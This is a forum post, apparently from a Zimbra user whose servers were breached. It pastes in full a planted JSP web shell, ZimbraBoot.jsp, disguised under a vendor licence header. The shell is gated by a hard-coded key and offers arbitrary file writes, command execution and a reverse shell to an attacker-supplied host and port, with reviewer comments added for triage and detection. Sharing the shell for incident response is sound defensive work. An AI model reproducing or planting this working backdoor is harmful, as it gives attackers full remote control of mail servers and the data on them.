If you have information on how to double-check whether the system is clean
robertvon wrote: Hi, we also get no newsletter.
Two of our servers were exploited because of the vulnerability.
At this time, AFAIK, the attacker uploaded a malicious file called ZimbraBoot.jsp to /opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp
after the patch, I will be happy to read it.
This is the file ZimbraBoot.jsp:
<!-- * ***** BEGIN LICENSE BLOCK *****
* Zimbra Collaboration Suite Web Client
* Copyright (C) 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013, 2014, 2015, 2016, 2017, 2018, 2019, 2020, 2021, 2022 Synacor, Inc.
*
* This program is free software: you can redistribute it and/or modify it under
* the terms of the GNU General Public License as published by the Free Software Foundation,
* version 2 of the License.
*
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY;
* without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
* See the GNU General Public License for more details.
* You should have received a copy of the GNU General Public License along with this program.
* If not, see <https://www.gnu.org/licenses/>.
* ***** END LICENSE BLOCK *****
-->
<%@ page import="java.io.*, java.util.Base64, java.nio.file.*, java.lang.*, java.io.*, java.net.*, java.util.*" %>
<% String output = ""; // Response text: the branches further down append to it and it is written into the response at the end of the page.
// NOTE(review): this page was reported as planted by an attacker on a compromised server. The
// comments here describe its behaviour for triage and detection only.
// NOTE(review): the licence header above the scriptlet looks like a vendor header; presumably it
// is there to make the file blend in with legitimate webapp files - do not treat it as proof of origin.
//
// StreamConnector is a helper thread that copies characters from one stream to another until the
// source stops delivering data or an error occurs. The "sh" branch later in this scriptlet starts
// two of them to join a spawned process to a network socket, one per direction.
class StreamConnector extends Thread {
InputStream wz; // source the thread reads from
OutputStream yr; // sink the thread writes to
StreamConnector(InputStream wz, OutputStream yr) {
this.wz = wz;
this.yr = yr;
}
// Copy loop; runs on its own thread once start() is called.
public void run() {
BufferedReader r = null;
BufferedWriter w = null;
try {
r = new BufferedReader(new InputStreamReader(wz));
w = new BufferedWriter(new OutputStreamWriter(yr));
char buffer[] = new char[8192];
int length;
// Forward data in chunks of up to 8192 characters and flush after every chunk, so the
// other side sees each piece immediately.
while((length = r.read(buffer, 0, buffer.length)) > 0) {
w.write( buffer, 0, length );
w.flush();
}
// Every error is swallowed: a broken or closed connection ends the loop without any log entry.
} catch( Exception e ) { }
try {
if (r != null) {
r.close();
}
if (w != null) {
w.close();
}
// Errors on close are swallowed as well.
} catch( Exception e ) { }
}
}
// Request handler of the planted page. It reads ordinary request parameters and, when the "key"
// parameter equals a hard-coded value, performs one of five actions: append, exec, sh, rewrite,
// create. The payload parameters "text" and "cmd" are Base64-decoded before use.
// Triage notes:
//  - The hard-coded key and the literal status strings ("Appended!", "Exec res: ",
//    "port opened on ", "Rewritten!", "Created!") are stable search strings for locating other
//    copies of this file and for matching captured HTTP responses.
//  - getParameter returns query-string as well as form-body parameters, so access logs that
//    record only the URL may show nothing more than the request path.
//  - File writes and process launches happen inside the web server's JVM, i.e. with the
//    privileges of the account that runs it.
String key = request.getParameter("key");
// Access gate: plain string comparison with a fixed value. Without a match nothing below runs
// and "output" stays empty.
if (key != null && key.equals("fomggpztgpdbyvftnpafbjbevpjqfwemt")) {
String action = request.getParameter("action");
if (action != null) {
// "append": appends the decoded "text" to the path given in "file". Only APPEND is passed, so
// the target has to exist already for the write to succeed.
if (action.equals("append")) {
String file = request.getParameter("file");
if (file != null) {
String textBase64 = request.getParameter("text");
if (textBase64 != null) {
String text = new String(Base64.getDecoder().decode(textBase64));
try {
Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.APPEND);
} catch(IOException e) {
// A failed write leaves a stack trace on the JVM's standard error; where the container
// captures that stream, the trace is a forensic artefact.
e.printStackTrace();
// The status text is added whether or not the write succeeded, so "Appended!" in a response
// does not prove that a file was changed.
} output+="Appended!";
}
}
// "exec": passes the decoded "cmd" string to Runtime.exec, so a program chosen by the requester
// runs as a child of the web server's JVM. Detection: unexpected child processes of the Java
// process that serves this webapp.
} else if (action.equals("exec")) {
String cmdBase64 = request.getParameter("cmd");
if (cmdBase64 != null) {
byte[] bytesEncoded = Base64.getDecoder().decode(cmdBase64);
String cmd = new String(bytesEncoded);String s = null;
try {
output += "Exec res: ";
Process p = Runtime.getRuntime().exec(cmd,null,null);
// Only the child's standard output is read back; lines are concatenated without separators.
BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) {
output += s;
}
} catch(IOException e) {
e.printStackTrace();
}
}
// "sh": opens an OUTBOUND TCP connection from the server to the host and port named in the
// request and joins a newly started shell process to it through two StreamConnector threads.
// Detection: outbound connections initiated by the Java process to unfamiliar addresses, and
// shell processes whose parent is that Java process.
} else if (action.equals("sh")) {
String ip = request.getParameter("ip");
if (ip != null) {
String port = request.getParameter("port");
if (port != null) {
try {
// Without "suid" the program is /bin/sh; with it, the supplied value is used as the program
// and " -p" is appended.
// NOTE(review): the parameter name suggests a setuid binary placed on the host beforehand -
// presumably worth searching for unexpected setuid files during cleanup; confirm.
String suid = request.getParameter("suid");
StringBuffer shell = new StringBuffer();
if (suid == null) {
shell.append("/bin/sh");
} else {
shell.append(suid);
shell.append(" -p");
}
Socket socket = new Socket(ip, Integer.parseInt(port));
Process process = Runtime.getRuntime().exec(shell.toString());
// One thread per direction: process output to the socket, socket input to the process.
new StreamConnector(process.getInputStream(), socket.getOutputStream()).start();
new StreamConnector(socket.getInputStream(), process.getOutputStream()).start();
// Written directly to the response through the JSP "out" object, not through "output".
out.println("port opened on " + socket);
// Any failure (bad port number, refused connection, missing program) is swallowed silently.
} catch( Exception e ) { }
}
}
// "rewrite": replaces the content of the path in "file" with the decoded "text". Only
// TRUNCATE_EXISTING is passed, so the target has to exist already.
} else if (action.equals("rewrite")) {
String file = request.getParameter("file");
if (file != null) {
String textBase64 = request.getParameter("text");
if (textBase64 != null) {
String text = new String(Base64.getDecoder().decode(textBase64));
try {
Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.TRUNCATE_EXISTING);
} catch(IOException e) {
e.printStackTrace();
}
// Added regardless of the outcome of the write.
output+="Rewritten!";
}
}
// "create": writes the decoded "text" to the path in "file", creating the file when it is
// missing. With CREATE as the only option an existing file is written from its start without
// being truncated first. Cleanup should treat every location writable by the service account
// as possibly modified and compare it with a known-good baseline.
} else if (action.equals("create")) {
String file = request.getParameter("file");
if (file != null) {
String textBase64 = request.getParameter("text");
if (textBase64 != null) {
String text = new String(Base64.getDecoder().decode(textBase64));
try {
Files.write(Paths.get(file), text.getBytes(), StandardOpenOption.CREATE);
} catch(IOException e) {
e.printStackTrace();
}
// Added regardless of the outcome of the write.
output+="Created!";
}
}
}
}
// The scriptlet ends on the next line; the expression that follows it writes the accumulated
// "output" text into the response body.
}%><%=output %>